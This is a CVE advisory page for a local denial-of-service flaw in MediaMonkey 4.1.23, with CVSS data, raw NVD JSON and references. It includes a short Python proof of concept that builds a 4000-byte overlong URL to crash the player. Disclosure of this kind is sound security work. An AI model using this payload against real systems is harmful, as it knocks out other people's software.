Security Vulnerability Report
CVE-2019-25571 CVSS 6.2 MEDIUM

CVE-2019-25571

Published: 2026-03-21 13:16:21
Last Modified: 2026-03-24 20:41:40

Description

MediaMonkey 4.1.23 contains a denial of service vulnerability that allows local attackers to crash the application by opening a specially crafted MP3 file containing an excessively long URL string. Attackers can create a malicious MP3 file with a buffer containing 4000 bytes of data appended to a URL, which causes the application to crash when the file is opened through the File > Open URL dialog.

CVSS Details

CVSS Score: 6.2
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:ventismedia:mediamonkey:4.1.23.1881:*:*:*:*:windows:*:* - VULNERABLE
MediaMonkey 4.1.23

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2019-25571
# This script demonstrates how to generate a malicious URL string
# that can trigger a Denial of Service in MediaMonkey 4.1.23.


def generate_malicious_url():
    # Base URL simulating a valid resource
    base_url = "http://example.com/song.mp3"
    # Buffer size to trigger the crash (4000 bytes as per description)
    buffer_size = 4000
    # Creating the payload with repeated characters
    payload = "A" * buffer_size
    # Appending payload to the URL
    malicious_url = base_url + payload
    return malicious_url


if __name__ == "__main__":
    exploit_url = generate_malicious_url()
    # In a real attack scenario, this URL would be passed to the
    # MediaMonkey application via the "File > Open URL" dialog.
    print(f"Generated Malicious URL Length: {len(exploit_url)}")
    print(f"Payload Preview: {exploit_url[:50]}...")
    # Save to file for reference
    with open("cve_2019_25571_poc.txt", "w") as f:
        f.write(exploit_url)
    print("Payload saved to cve_2019_25571_poc.txt")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25571", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:21.017", "lastModified": "2026-03-24T20:41:40.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MediaMonkey 4.1.23 contains a denial of service vulnerability that allows local attackers to crash the application by opening a specially crafted MP3 file containing an excessively long URL string. Attackers can create a malicious MP3 file with a buffer containing 4000 bytes of data appended to a URL, which causes the application to crash when the file is opened through the File > Open URL dialog."}, {"lang": "es", "value": "MediaMonkey 4.1.23 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales colapsar la aplicación al abrir un archivo MP3 especialmente diseñado que contiene una cadena de URL excesivamente larga. Los atacantes pueden crear un archivo MP3 malicioso con un búfer que contiene 4000 bytes de datos adjuntos a una URL, lo que hace que la aplicación colapse cuando el archivo se abre a través del diálogo Archivo > Abrir URL."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": 
"NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-226"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ventismedia:mediamonkey:4.1.23.1881:*:*:*:*:windows:*:*", "matchCriteriaId": "9775D85A-1A25-482E-AB2D-B40E37061C2E"}]}]}], 
"references": [{"url": "https://www.exploit-db.com/exploits/46378", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.mediamonkey.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.mediamonkey.com/sw/MediaMonkey_4.1.23.1881.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/mediamonkey-denial-of-service-via-malformed-url", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}